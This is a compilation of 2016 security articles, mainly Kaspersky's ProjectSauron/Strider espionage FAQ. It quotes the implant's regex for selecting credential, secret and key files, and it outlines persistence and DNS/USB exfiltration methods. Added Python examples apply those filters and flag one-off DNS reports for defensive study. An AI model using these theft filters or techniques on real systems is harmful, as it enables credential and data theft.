Trends and Analysis

Symantec Discovers Strider, A New CyberEspionage Group

Active for five years, this highly selective threat actor is only known to have compromised seven organizations. Symantec has discovered a previously unknown cyberespionage group so selective in its targets that it is only known to have compromised seven organizations and 36 endpoints since it started operating five years ago.

Dubbed "Strider" by Symantec, the threat actor's malware of choice is Remsec, a custom Windows infostealer that is stealthy, modular, and written in Lua. The seven organizations include targets in Russia, an airline in China, an embassy in Belgium, and an organization in Sweden.

DiMaggio says this is an extremely small number of targets, even for a sophisticated actor. "That's exactly why this is so interesting to us," says Jon DiMaggio, senior threat intelligence analyst at Symantec. "... The fact that someone invested the time and money into creating custom malware and only used it on this many targets." He says targeting this focused means that someone has gone through a lot of trouble and done a lot of reconnaissance.

Symantec has not speculated on Strider's origins or Remsec's creators, other than to say in today's blog announcing the discovery that it is "possible that the group is a nation-state level attacker." Researchers do acknowledge, however, that the group's attacks have "tentative links" with earlier cyberespionage malware -- Flame, highly sophisticated malware that mostly hit targets in the Middle East and was widely thought to derive from Western sources. Remsec and Flame both use modules written in the Lua programming language, which is a rare technique.

DiMaggio says that using Lua is one of the Remsec authors' "self-protection mechanisms." Common security tools' usual logic and detection engines are less likely to find uncommon methods like this. It's the same reason, DiMaggio says, that some components of the Remsec malware are in the form of executable blobs (binary large objects), which are also less common. "That's what I would do if I was writing malware," says DiMaggio. It's not the end of Remsec's stealth mechanisms either.

According to the Symantec blog, "much of the functionality is deployed over the network, meaning it resides only in a computer's memory and is never stored on disk." The Lua modules in Remsec include a network loader, a host loader, a network listener, a basic pipe back door, a more advanced pipe back door (which can read, write, and delete files), an HTTP back door that includes URLs for a command-and-control server, and a keylogger. The keylogger contains the word "Sauron" in the code -- perhaps named after the Lord of the Rings character and his famous flaming all-seeing eye.
Symantec continued with the LOTR theme when they named the threat actor Strider, one of Aragorn's alternate names. For the complete indicators of compromise, see Symantec's blog post announcing the discovery.

Sara Peters is Senior Editor at Dark Reading and formerly the editor-in-chief of Enterprise Efficiency. Prior to that she was senior editor for the Computer Security Institute, writing and speaking about virtualization, identity management, cybersecurity law, and a myriad ...

ProjectSauron: top level cyber-espionage platform covertly extracts encrypted government comms

Download the full report (PDF). Also available: technical analysis, indicators of compromise (IOC), and YARA rules. More information about ProjectSauron is available to customers of Kaspersky Intelligence Reporting Service.

Introduction

Over the last few years, the number of “APT-related” incidents described in the media has grown significantly.

For many of these, though, the designation “APT”, indicating an “Advanced Persistent Threat”, is usually an exaggeration. With some notable exceptions, few of the threat actors usually described in the media are advanced.

These exceptions, which in our opinion represent the pinnacle of cyberespionage tools, the truly “advanced” threat actors out there, are Equation, Regin, Duqu and Careto.

Another such exceptional espionage platform is “ProjectSauron”, also known as “Strider”.

What differentiates a truly advanced threat actor from a wannabe APT? Here are a few features that characterize the ‘top’ cyberespionage groups:

- The use of zero day exploits
- Unknown, never identified infection vectors
- Have compromised multiple government organizations in several countries
- Have successfully stolen information for many years before being discovered
- Have the ability to steal information from air gapped networks
- Support multiple covert exfiltration channels on various protocols
- Malware modules which can exist only in memory without touching the disk
- Unusual persistence techniques which sometimes use undocumented OS features

“ProjectSauron” easily covers many of these points.

From discovery to detection

When talking about long-standing cyber-espionage campaigns, many people wonder why it took so long to catch them. Perhaps one of the explanations is having the right tools for the right job.

Trying to catch government or military grade malware requires specialized technologies and products. One such product is Kaspersky’s Anti-Targeted Attack Platform (KATA).

In September 2015, our anti-targeted attack technologies caught a previously unknown attack.

The suspicious module was an executable library, loaded in the memory of a Windows domain controller (DC).

The library was registered as a Windows password filter and had access to sensitive data in cleartext.

Additional research revealed signs of massive activity from a new threat actor that we codenamed ‘ProjectSauron’, responsible for large-scale attacks against key governmental entities in several countries.

[Figure: “SAURON” – internal name used in the LUA scripts]

ProjectSauron comprises a top-of-the-top modular cyber-espionage platform in terms of technical sophistication, designed to enable long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods.

Technical details show how attackers learned from other extremely advanced actors in order to avoid repeating their mistakes.

For example, all artifacts are customized per given target, reducing their value as indicators of compromise for any other victim.

Some other key features of ProjectSauron:

- It is a modular platform designed to enable long-term cyber-espionage campaigns.
- All modules and network protocols use strong encryption algorithms, such as RC6, RC5, RC4, AES, Salsa20, etc.
- It uses a modified LUA scripting engine to implement the core platform and its plugins. There are upwards of 50 different plugin types.
- The actor behind ProjectSauron has a high interest in communication encryption software widely used by targeted governmental organizations. It steals encryption keys, configuration files, and IP addresses of the key infrastructure servers related to the encryption software.
- It is able to exfiltrate data from air-gapped networks by using specially-prepared USB storage drives where data is stored in an area invisible to the operating system.
- The platform makes extensive use of the DNS protocol for data exfiltration and real-time status reporting.
- The APT was operational as early as June 2011 and remained active until April 2016.
- The initial infection vector used to penetrate victim networks remains unknown.
- The attackers utilize legitimate software distribution channels for lateral movement within infected networks.

To help our readers better understand the ProjectSauron attack platform, we’ve prepared an FAQ which brings together some of the most important points about this attacker and its tools.

A brief technical report is also available, including IOCs and Yara rules. Our colleagues from Symantec have also released their analysis on ProjectSauron / Strider. You can read it here.

ProjectSauron FAQ

1. What is ProjectSauron?

ProjectSauron is the name for a top level modular cyber-espionage platform, designed to enable and manage long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods. Technical details show how attackers learned from other extremely advanced actors in order to avoid repeating their mistakes.

As such, all artifacts are customized per given target, reducing their value as indicators of compromise for any other victim. Usually APT campaigns have a geographical nexus, aimed at extracting information within a specific region or from a given industry.

That usually results in several infections in countries within that region, or in the targeted industry around the world.

Interestingly, ProjectSauron seems to be dedicated to just a couple of countries, focused on collecting high value intelligence by compromising almost all key entities it could possibly reach within the target area. The name ProjectSauron reflects the fact that the code authors refer to ‘Sauron’ in the LUA scripts.

2. Who are the victims?

Using our telemetry, we found more than 30 infected organizations in Russia, Iran, Rwanda and possibly in Italian-speaking countries as well. Many more organizations and geographies are likely to be affected. The attacked organizations are key entities that provide core state functions:

- Government
- Scientific research centers
- Military
- Telecommunication providers
- Finance

3. Have you notified victims?

As usual, Kaspersky Lab actively collaborates with industry partners, CERTs and law enforcement agencies to notify victims and help to mitigate the threat. We also rely on public awareness to spread information about it. If you need more information about this actor, please contact

4. For how long have the attackers been active?

Forensic analysis indicates that the APT has been operational since at least June 2011 and was still active in 2016. Although it appears to have largely ceased, there is a chance that it is still active on computer systems that are not covered by Kaspersky Lab solutions.

5. Did the attackers use interesting or advanced techniques?

The attackers used multiple interesting and unusual techniques, including:

- Data exfiltration and real-time status reporting using DNS requests.
- Implant deployment using legitimate software update scripts.
- Data exfiltration from air-gapped networks through the use of specially prepared USB storage drives where the stolen data is stored in the area unused by standard tools of the operating system.
- Using a modified LUA scripting engine to implement the core platform and its plugins.

The use of LUA components in malware is very rare – it was previously spotted in the Flame and Animal Farm attacks.

6. How did you discover this malware?

In September 2015, Kaspersky Lab’s Anti-Targeted Attack Platform discovered anomalous network traffic in a client organization’s network.

Analysis of this incident led to the discovery of a strange executable program library loaded into the memory of the domain controller server.

The library was registered as a Windows password filter and had access to sensitive data such as administrative passwords in cleartext.

Additional research revealed signs of activity of a previously unknown threat actor.

7. How does ProjectSauron operate?

ProjectSauron usually registers its persistence module on domain controllers as a Windows LSA (Local Security Authority) password filter.

This feature is typically used by system administrators to enforce password policies and validate new passwords to match specific requirements, such as length and complexity.

This way, the ProjectSauron passive backdoor module starts every time any network or local user (including an administrator) logs in or changes a password, and promptly harvests the password in plaintext. In cases where domain controllers lack direct Internet access, the attackers install additional implants on other local servers which have both local network and Internet access and may pass through a significant amount of network traffic, e.g. proxy servers, web servers, or software update servers.

After that, these intermediary servers are used by ProjectSauron as internal proxy nodes for silent and inconspicuous data exfiltration, blending in with high volumes of legitimate traffic. Once installed, the main ProjectSauron modules start working as ‘sleeper cells’, displaying no activity of their own and waiting for ‘wake-up’ commands in the incoming network traffic.

This method of operation ensures ProjectSauron’s extended persistence on the servers of targeted organizations.

8. What kind of implants does ProjectSauron use?

Most of ProjectSauron’s core implants are designed to work as backdoors, downloading new modules or running commands from the attacker purely in memory.

The only way to capture these modules is by making a full memory dump of the infected systems. Almost all of ProjectSauron’s core implants are unique, have different file names and sizes, and are individually built for each target.

Each module’s timestamp, both in the file system and in its own headers, is tailored to the environment on which it is installed. Secondary ProjectSauron modules are designed to perform specific functions like stealing documents, recording keystrokes, and stealing encryption keys from both infected computers and attached USB sticks. ProjectSauron implements a modular architecture using its own virtual file system to store additional modules (plugins) and a modified LUA interpreter to execute internal scripts.

There are upwards of 50 different plugin types.

9. What is the initial infection vector?

To date, the initial infection vector used by ProjectSauron to penetrate victim networks remains unknown.

10. How were the ProjectSauron implants deployed within the target network?

In several cases, ProjectSauron modules were deployed through the modification of scripts used by system administrators to centrally deploy legitimate software updates within the network. In essence, the attackers injected a command to start the malware by modifying existing software deployment scripts.

The injected malware is a tiny module that works as a simple downloader. Once started under a network administrator account, this small downloader connects to a hard-coded internal or external IP address and downloads the bigger ProjectSauron payload from there. In cases where the ProjectSauron persistence container is stored on disk in EXE file format, it disguises the files with legitimate software file names.

11. What C&C infrastructure did the attackers use?

The ProjectSauron actor is extremely well prepared when it comes to operational security. Running an expensive cyberespionage campaign like ProjectSauron requires vast domain and server infrastructure uniquely assigned to each victim organization and never reused again.

This makes traditional network-based indicators of compromise almost useless because they won’t be reused in any other organization. We collected 28 domains linked to 11 IPs located in the United States and several European countries that might be connected to ProjectSauron campaigns.

Even the diversity of ISPs selected for ProjectSauron operations makes it clear that the actor did everything possible to avoid creating patterns.

12. Does ProjectSauron target isolated (air-gapped) networks?

Yes. We registered a few cases where ProjectSauron successfully penetrated air-gapped networks. The ProjectSauron toolkit contains a special module designed to move data from air-gapped networks to Internet-connected systems.

To achieve this, removable USB devices are used. Once networked systems are compromised, the attackers wait for a USB drive to be attached to the infected machine. These USBs are specially formatted to reduce the size of the partition on the USB disk, reserving an amount of hidden data (several hundred megabytes) at the end of the disk for malicious purposes.

This reserved space is used to create a new custom-encrypted partition that won’t be recognized by a common OS, such as Windows.

The partition has its own semi-filesystem (or virtual file system, VFS) with two core directories: ‘In’ and ‘Out’. This method also bypasses many DLP products, since software that disables the plugging of unknown USB devices based on DeviceID wouldn’t prevent an attack or data leakage, because a genuine recognized USB drive was used.

13. Does ProjectSauron target critical infrastructure?

Some of the entities infected by ProjectSauron can be classified as critical infrastructure. However, we haven’t registered ProjectSauron infections inside industrial control system networks that have SCADA systems in place. Also, we have not yet seen a ProjectSauron module targeting any specific industrial hardware or software.

14. Did ProjectSauron use any special communication methods?

For network communication, the ProjectSauron toolkit has extensive abilities, leveraging the stack of the most commonly used protocols: ICMP, UDP, TCP, DNS, SMTP and HTTP. One of the ProjectSauron plugins is the DNS data exfiltration tool.

To avoid generic detection of DNS tunnels at network level, the attackers use it in low-bandwidth mode, which is why it is used solely to exfiltrate target system metadata. Another interesting feature in ProjectSauron malware that leverages the DNS protocol is the real-time reporting of the operation progress to a remote server. Once an operational milestone is achieved, ProjectSauron issues a DNS request to a special subdomain unique to each target.

15. What is the most sophisticated feature of the ProjectSauron APT?

In general, the ProjectSauron platform is very advanced and reaches the level of complexity of Regin, Equation and similar threat actors we have reported on in the past. Some of the most interesting things in the ProjectSauron platform include:

- Multiple exfiltration mechanisms, including piggybacking on known protocols.
- Bypassing air-gaps using hidden data partitions on USB sticks.
- Hijacking Windows LSA to control network domain servers.
- Implementing an extended LUA engine to write custom malicious scripts to control the entire malware platform with a high-level language.
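The DNS milestone reporting described in question 14 (a single request to a subdomain unique to each target, sent in low-bandwidth mode) gives a volume-based tunnel detector little to work on. The block below is an added example, not Kaspersky's code: it scores each query by the length and entropy of its leftmost label and by how rarely its base domain appears, over constructed resolver log lines in an assumed format.

```python
import math
import re
from collections import defaultdict

# Constructed resolver log lines in an assumed "<time> <client> <qname> <qtype>"
# layout (not any real product's format). The two *.report-placeholder.test
# queries stand in for one-off milestone reports; softwareupdates.example.com is
# a benign long label included to show why entropy alone is not enough.
SAMPLE_LOG = """\
10:00:01 10.0.0.5 www.example.com A
10:00:02 10.0.0.5 softwareupdates.example.com A
10:00:03 10.0.0.7 mail.example.com MX
10:01:00 10.0.0.5 3f9a1c7e4b2d.stage1.report-placeholder.test A
10:01:10 10.0.0.5 cdn.example.com A
10:02:00 10.0.0.5 9e0b77d1a4c3f8.stage2.report-placeholder.test A
10:03:00 10.0.0.9 intranet.example.com A
10:03:30 10.0.0.9 www.example.com A
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def parse_log(text):
    """Return (time, client, qname, qtype) tuples; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            t, client, qname, qtype = m.groups()
            records.append((t, client, qname.rstrip(".").lower(), qtype))
    return records


def shannon_entropy(s):
    """Shannon entropy of s in bits per character (0.0 for the empty string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def base_domain(qname):
    """Crude registrable-domain heuristic: the last two labels (assumption; a
    real deployment would consult the Public Suffix List instead)."""
    labels = qname.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def suspicious_queries(records, min_label_len=10, min_entropy=3.0, max_base_hits=2):
    """Flag queries whose leftmost label is long and high-entropy AND whose base
    domain is rarely seen in the log. Low volume is the point: a milestone
    report is a single query, so request counts and byte volume, which a
    generic tunnel detector relies on, are deliberately not used."""
    hits_per_base = defaultdict(int)
    for _, _, qname, _ in records:
        hits_per_base[base_domain(qname)] += 1
    flagged = []
    for _, client, qname, _ in records:
        first = qname.split(".")[0]
        rare_base = hits_per_base[base_domain(qname)] <= max_base_hits
        if len(first) >= min_label_len and shannon_entropy(first) >= min_entropy and rare_base:
            flagged.append((client, qname))
    return flagged


if __name__ == "__main__":
    for client, qname in suspicious_queries(parse_log(SAMPLE_LOG)):
        print(f"suspicious one-off DNS query from {client}: {qname}")
```

The benign softwareupdates label clears the entropy threshold but its base domain is queried six times, so only the two one-off report-placeholder.test queries are flagged.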

16. Are the attackers using any zero-day vulnerabilities?

To date we have not found any 0-day exploits associated with ProjectSauron. However, when penetrating isolated systems, the creation of the encrypted storage area in the USB does not in itself enable attackers to get control of the air-gapped machines.

There has to be another component such as a 0-day exploit placed on the main partition of the USB drive. So far we have not found any 0-day exploit embedded in the body of the malware we analyzed, and we believe it was probably deployed in rare, hard-to-catch instances.

17. Is this a Windows-only threat? What versions of Windows are targeted?

ProjectSauron works on all modern Microsoft Windows operating systems – both x64 and x86. We have witnessed infections running on Windows XP x86 as well as Windows 2012 R2 Server Edition x64. To date, we haven’t found a non-Windows version of ProjectSauron.

18. Were the attackers hunting for specific information?

ProjectSauron actively searches for information related to rather uncommon, custom network encryption software.

This client-server software is widely adopted by many of the target organizations to secure communications, voice, email, and document exchange. In a number of the cases we analyzed, ProjectSauron deployed malicious modules inside the custom network encryption’s software directory, disguised under similar filenames and accessing the data placed beside its own executable.
Some of extracted LUA scripts show that the attackers have a high interest in the software components, keys, configuration files, and the location of servers that relay encrypted messages between the nodes. Also, one of the embedded ProjectSauron configurations contains a special unique identifier for the targeted network encryption software’s server within its virtual network.

The behavior of the component that searches for the server IP address is unusual.

After getting the IP, the ProjectSauron component tries to communicate with the remote server using its own (ProjectSauron) protocol as if it was yet another C&C server.

This suggests that some communication servers running the mentioned network encryption software could also be infected with ProjectSauron.

19. What exactly is being stolen from the targeted machines?

The ProjectSauron modules we found are able to steal documents, record keystrokes and steal encryption keys from infected computers and attached USB sticks. The fragment of configuration block below, extracted from ProjectSauron, shows the kind of information and file extensions the attackers were looking for:

    .*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*|.*user.*|.*name|.*email|.*_id|id|uid|mn|mailaddress|.*nick.*|alias|codice|uin|sign-in|strCodUtente|.*pass.*|.*pw|pw.*|additional_info|.*secret.*|.*segreto.*[^\$]$
    ^.*\.(doc|xls|pdf)$
    *.txt;*.doc;*.docx;*.ppt;*.pptx;*.xls;*.xlsx;*.vsd;*.wab;*.pdf;*.dst;*.ppk;*.rsa;*.rar;*.one;*.rtf;~WPL*.tmp;*.FTS;*.rpt;*.conf;*.cfg;*.pk2;*.nct;*.key;*.psw

Interestingly, while most of the words and extensions above are in the English language, several of them point to Italian, such as: ‘codice’, ‘strCodUtente’ and ‘segreto’.

Keywords / filenames targeted by ProjectSauron data theft modules:

    Italian keyword   Translation
    Codice            code
    CodUtente         user code
    Segreto           secret

This suggests the attackers had prepared to attack Italian-speaking targets as well. However, we are not aware of any Italian victims of ProjectSauron at the moment.

20. Have you observed any artifacts indicating who is behind the ProjectSauron APT?

Attribution is hard and reliable attribution is rarely possible in cyberspace. Even with confidence in various indicators and apparent attacker mistakes, there is a greater likelihood that these are smoke and mirrors created by an attacker with a greater vantage point and vast resources. When dealing with the most advanced threat actors, as is the case with ProjectSauron, attribution becomes an unsolvable problem.
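The configuration fragment quoted in question 19 can be turned directly into a file-selection check, which lets a defender see which names on a host fall under the actor's collection criteria. The block below is an added example, not code from the report; the case-insensitive whole-name matching semantics and the sample names are assumptions.

```python
import fnmatch
import re

# The three selection filters exactly as quoted in question 19 of the report.
KEYWORD_PATTERN = (
    r".*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*|.*user.*|.*name|.*email"
    r"|.*_id|id|uid|mn|mailaddress|.*nick.*|alias|codice|uin|sign-in|strCodUtente"
    r"|.*pass.*|.*pw|pw.*|additional_info|.*secret.*|.*segreto.*[^\$]$"
)
EXTENSION_PATTERN = r"^.*\.(doc|xls|pdf)$"
GLOB_LIST = (
    "*.txt;*.doc;*.docx;*.ppt;*.pptx;*.xls;*.xlsx;*.vsd;*.wab;*.pdf;*.dst;*.ppk;"
    "*.rsa;*.rar;*.one;*.rtf;~WPL*.tmp;*.FTS;*.rpt;*.conf;*.cfg;*.pk2;*.nct;*.key;*.psw"
)

# Assumption: the implant applies these case-insensitively to a whole name
# (the report does not state the matching semantics).
KEYWORD_RE = re.compile(KEYWORD_PATTERN, re.IGNORECASE)
EXTENSION_RE = re.compile(EXTENSION_PATTERN, re.IGNORECASE)
GLOB_PATTERNS = [g.strip().lower() for g in GLOB_LIST.split(";") if g.strip()]


def matching_filters(name):
    """Return the set of filter labels that `name` satisfies:
    'keyword' (credential-style names), 'ext_regex' (.doc/.xls/.pdf only)
    and 'glob' (the semicolon-separated extension list)."""
    hits = set()
    if KEYWORD_RE.fullmatch(name):
        hits.add("keyword")
    if EXTENSION_RE.fullmatch(name):
        hits.add("ext_regex")
    if any(fnmatch.fnmatchcase(name.lower(), g) for g in GLOB_PATTERNS):
        hits.add("glob")
    return hits


def audit(names):
    """Map each name that matches at least one filter to its sorted filter labels."""
    result = {}
    for n in names:
        hits = matching_filters(n)
        if hits:
            result[n] = sorted(hits)
    return result


# Constructed candidate names, chosen to exercise each filter and two quirks:
# .xlsx is caught only by the glob list (the regex stops at .xls), and the
# [^\$]$ tail binds only to the last alternative, so "segreto$" escapes the
# keyword filter while "password$" does not.
SAMPLE_NAMES = [
    "login.txt", "budget2016.xlsx", "report.pdf", "~WPL0042.tmp",
    "strCodUtente", "password$", "segreto$", "notes.md", "server.key",
]

if __name__ == "__main__":
    for name, labels in audit(SAMPLE_NAMES).items():
        print(f"{name:18s} -> {', '.join(labels)}")
```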
21. Is this a nation-state sponsored attack?

We think an operation of such complexity, aimed at stealing confidential and secret information, can only be executed with support from a nation-state.

22. What would ProjectSauron have cost to set up and run?

Kaspersky Lab has no exact data on this, but estimates that the development and operation of ProjectSauron is likely to have required several specialist teams and a budget probably running into millions of dollars.

23. How does the ProjectSauron platform compare to other top-level threat actors?

The actor behind ProjectSauron is very advanced, comparable only to the top-of-the-top in terms of sophistication: alongside Duqu, Flame, Equation, and Regin. Whether related or unrelated to these advanced actors, the ProjectSauron attackers have definitely learned from them. As a reminder, here are some features of other APT attackers which we discovered that the ProjectSauron attackers had carefully learned from or emulated:

Duqu:
- Use of intranet C&Cs (where compromised target servers may act as independent C&Cs)
- Running only in memory (persistence on a few gateway hosts only)
- Use of different encryption methods per victim
- Use of named pipes for LAN communication
- Malware distribution through legitimate software deployment channels

Flame:
- LUA-embedded code
- Secure file deletion (through data wiping)
- Attacking air-gapped systems via removable devices

Equation and Regin:
- Usage of RC5/RC6 encryption
- Virtual Filesystems (VFS)
- Attacking air-gapped systems via removable devices
- Hidden data storage on removable devices

These other actors also showed what made them vulnerable to potential exposure, and ProjectSauron did its best to address these issues:

- Vulnerable or persistent C&C locations
- ISP name, IP, domain, and tools reuse across different campaigns
- Crypto-algorithm reuse (as well as encryption keys)
- Forensic footprint on disk
- Timestamps in various components
- Large volumes of exfiltrated data, alarming unknown protocols or message formats

In addition, it appears that the attackers took special care with what we consider as indicators of compromise and implemented a unique pattern for each and every target they attacked, so that the same indicators would have little value for anyone else.

This is a summary of the ProjectSauron strategy as we see it.

The attackers clearly understand that we as researchers are always looking for patterns. Remove the patterns and the operation will be harder to discover. We are aware of more than 30 organizations attacked, but we are sure that this is just a tiny tip of the iceberg.

24. Do Kaspersky Lab products detect all variants of this malware?

All Kaspersky Lab products detect ProjectSauron samples as HEUR:Trojan.Multi.Remsec.gen.

25. Are there Indicators of Compromise (IOCs) to help victims identify the intrusion?

ProjectSauron’s tactics are designed to avoid creating patterns.
Implants and infrastructure are customized for each individual target and never re-used – so the standard security approach of publishing and checking for the same basic indicators of compromise (IOC) is of little use. However, structural code similarities are inevitable, especially for non-compressed and non-encrypted code.

This opens up the possibility of recognizing known code in some cases. That’s why, alongside the formal IOCs, we have added relevant YARA rules. While the IOCs have been listed mainly to give examples of what they look like, the YARA rules are likely to be of greater use and could detect real traces of ProjectSauron. For background: YARA is a tool for uncovering malicious files or patterns of suspicious activity on systems or networks that share similarities. YARA rules—basically search strings—help analysts to find, group, and categorize related malware samples and draw connections between them in order to build malware families and uncover groups of attacks that might otherwise go unnoticed. We have prepared our YARA rules based on tiny similarities and oddities that stood out in the attackers’ techniques.

These rules can be used to scan networks and systems for the same patterns of code.
If some of these oddities appear during such a scan, there is a chance that the organization has been hit by the same actor. More information about ProjectSauron is available to customers of Kaspersky Intelligence Reporting Service.


Blackhat USA 2016

This year’s Blackhat USA briefings were held at the spacious Mandalay Bay, bringing speakers from all over the world to deliver mostly technical cyber-security talks. A number of our researchers were there attending talks and participating in the parallel IOActive and BSides events on Smart Cities cyber-security and “Stealing Food From the Cat’s Mouth”. We even bought a round of drinks for a GReAT happy hour at our booth, thanks for coming by! And on Tuesday night, we announced a public HackerOne-coordinated bug bounty program, setting aside $50,000 for critical vulnerabilities. Blackhat whitepapers, slidedecks, and some source code are being posted to the site.

Talks and speakers that we enjoyed here:

DEMYSTIFYING THE SECURE ENCLAVE PROCESSOR and BEHIND THE SCENES OF IOS SECURITY

Low level details of Apple iPhone security were presented, both from offensive researchers hacking apart hardware and software, and from one of the vendor’s lead security engineers, Ivan Krstic. They revealed cryptographic design and implementation details of the secure enclave processor and its OS, the iCloud keychain, and JIT hardening, and pointed out some weaknesses and areas for likely security vulnerabilities in the code.

CAPTAIN HOOK: PIRATING AVS TO BYPASS EXPLOIT MITIGATIONS

The speakers demonstrated how many AV vendors perform inline and kernel-to-user hooking for exploit mitigation, and how this is being done insecurely. They were able to utilize the mistakes made in the various hooking engines to run malicious code in memory. Their research identified six different types of vulnerabilities in the hooking engines and how to exploit them. Essentially, most of the vulnerabilities boiled down to improper handling of permissions on created memory blocks by the AV engines.
ADVANCED CAN INJECTION TECHNIQUES FOR VEHICLE NETWORKS

As always, Charlie and Chris delivered a fantastic talk on the next step in their research: targeting CAN to manipulate vehicle behaviors while driving at high speeds. While their research was done hard-wired into the car, they stated that if another remote vulnerability were discovered, these attacks would be plausible remotely, not requiring physical access. They showed how they were able to manipulate various vehicles to apply the emergency brake, turn off the power steering module, control the steering, etc., all while driving at high speed. They had to essentially bypass security measures which don’t normally allow diagnostic mode to be invoked while the car is on or in motion. In normal Charlie and Chris fashion, the talk was full of funny videos of their exploits, one of which showed them crashing their Jeep into a ditch in a cornfield and subsequently having to be rescued by some locals. 🙂

A few GReAT researchers were caricatured by an artist at our Kaspersky Lab booth, next to our Kaspersky Anti-Targeted Attack demo. The artist was good! Defcon’s challenge badges ran out in record time this year at under 60 minutes! The conference is going on now at Paris and Bally’s. See you next year!

Hackers Used Malware To Spy On A Territorial Dispute

Cyber warfare appears to be the latest tool deployed in the territorial dispute over the South China Sea. Hackers have used targeted malware to steal data from some of the governments and private sector organisations involved in the disput...

Best Of Black Hat Innovation Awards: And The Winners Are…

Three companies and leaders who think differently about security: Deep Instinct, most innovative startup; Vectra, most innovative emerging company; Paul Vixie, most innovative thought leader. Dark Reading this year is launching a new annual awards program, the Best of Black Hat Awards, which recognizes innovative companies and business leaders on the conference’s exhibit floor. The 2016 Dark Reading Best of Black Hat Awards recognize three categories of achievement: the Most Innovative Startup, which cites companies that have been in the industry for three years or less; the Most Innovative Emerging Company, which cites companies that have been operating for three to five years; and the Most Innovative Thought Leader, which recognizes individuals from exhibiting companies who are changing the way the industry thinks about security. These new awards, chosen by the editors of Dark Reading, are not an endorsement of any product, but are designed to recognize innovative technology ideas and new thinking in the security arena.
In future years, Dark Reading hopes to expand the awards program to recognize new products in different categories, as well as more individuals who are making a difference in the way we think about security.

Most Innovative Startup: Deep Instinct

The finalists for our Most Innovative Startup Award are Deep Instinct, which is driving past machine learning with an artificial intelligence concept called deep learning; Phantom, a security orchestration tool that provides a layer of connective tissue between existing security products; and SafeBreach, which provides a hacker’s view of enterprise security posture. The winner is: Deep Instinct. Here’s what our judges wrote about Deep Instinct:

“This was not an easy decision—each of the finalists, Phantom, Deep Instinct, and SafeBreach, bring really intriguing and useful technology to the security problem. In the end, we selected Deep Instinct as the Most Innovative Startup. Here’s why: the concept of a cerebral system to detect malware and malicious activity at the point of entry in real-time and quashing it then and there solves many of the other security problems down the line.
If the tool can catch the malware when it hits the endpoint, a security pro theoretically wouldn’t need to check out security alerts, correlate them among various security tools and threat intel feeds, and then take the appropriate action (sometimes too late).

And unlike traditional antivirus, this technology looks at all types of threats, not just known malware, which of course is key today given the polymorphic nature of malware. We considered Deep Instinct’s approach of automatically stopping a threat at the endpoint, where it first comes in, using software that can on its own understand that it’s a threat and continuously learn about threats as unique and promising for security organizations.

Deep learning is the next stage of machine learning, mimicking the brain’s ability to learn and make decisions, and Deep Instinct is the first company to apply this type of artificial intelligence to cybersecurity, which also made it a top choice. In addition, benchmark tests of Deep Instinct’s technology indicate a high degree of accuracy in detecting malware, at 99.2%.

And unlike some endpoint security approaches, it occurs locally and there’s no sandbox or kicking it to the cloud for additional analysis.”

Most Innovative Emerging Company: Vectra

The three finalists for our Most Innovative Emerging Company are SentinelOne, which combines behavioral-based inspection of endpoint system security processes with machine learning; Vectra, which offers real-time detection of in-progress cyber attacks and helps prioritize the attacks based on business priority; and ZeroFOX, which monitors social media to help protect against phishing attacks and account compromise. And the winner is: Vectra. Here’s what our judges wrote about Vectra: “It was a tough choice, but in the end, we selected Vectra, because it addressed several of security professionals’ most persistent challenges, with solutions that were both inventive and practical. Infosec pros are inundated with alerts about threats. Whether those warnings come from media reports, newsletters, or one of many pieces of security technology, it’s often hard to prioritize them. Maybe it was declared “critical,” but is it critical to me? Maybe it was “medium,” but is it critical to me? Infosec pros have attackers dwelling on their networks for many, many months, largely because security teams cannot quickly make sense of all this threat data.

And infosec pros try to solve problems faster by adding new security technology that can sometimes put a huge strain on the network. We chose Vectra as the winner, because their solution helps prioritize threats for your organization specifically, can reduce attacker dwell time, and does so with a lightweight solution. Vectra’s tool tunes into all an organization’s internal network communications, and then, using a combination of machine learning, behavior analysis, and data science, will identify threats, correlate them to the targeted endpoint, provide context, and prioritize threats accordingly -- as they relate to your organization.
Vectra can detect things like internal reconnaissance, lateral movement, botnet monetization, data exfiltration and other malicious or potentially malicious activities throughout the kill chain. Most importantly, Vectra’s tool allows security teams to identify their most important assets, so that the tool will know to push even a gentle nudge at those systems to the top of the priority list. With just a glance at the simple, elegant visualization used by Vectra’s threat certainty index, an infosec pro will know in moments what precise endpoint needs their attention first.”

Most Innovative Thought Leader: Paul Vixie

The three finalists for our Most Innovative Thought Leader are Krishna Narayanaswamy, Chief Scientist and Co-Founder of Netskope, Inc., a top specialist in cloud security; Dr. Paul Vixie, Chairman, CEO, and Co-Founder of Farsight Security Inc., a leader in DNS and Internet security; and Jeff Williams, Chief Technology Officer and Co-Founder of Contrast Security, who focuses on application security. And the winner is: Paul Vixie, Farsight Security. Here’s what our judges wrote about Paul: “This was perhaps the most difficult choice we had to make in the awards, because all three of these individuals are thought leaders and difference-makers in their own fields of security.

Each of them is a contributor not only to innovation in his own company, but to the industry at large. In the end, we chose Paul Vixie, at least in part, because he likes to work and research and innovate in areas where few others are working.

The world of Domain Name Systems often seems impenetrable even to security experts, yet it is an essential element to the global Internet and, potentially, a huge set of vulnerabilities that could affect everyone who works and plays online. In the last year or so, Paul has taken some of the lessons he’s learned about DNS and the way the internet works and built Farsight Security, which collects and processes more than 200,000 observations per second to help security operations centers and incident response teams more quickly identify threats.
It works by analyzing DNS, which is a fundamental technology that the bad guys have to use, just as the good guys do.

And while Farsight is not the only company working in the DNS security space, it has developed new methods of analyzing and processing the data so that enterprises can make better use of relevant information. Paul doesn’t stop with the work he is doing at his own company.

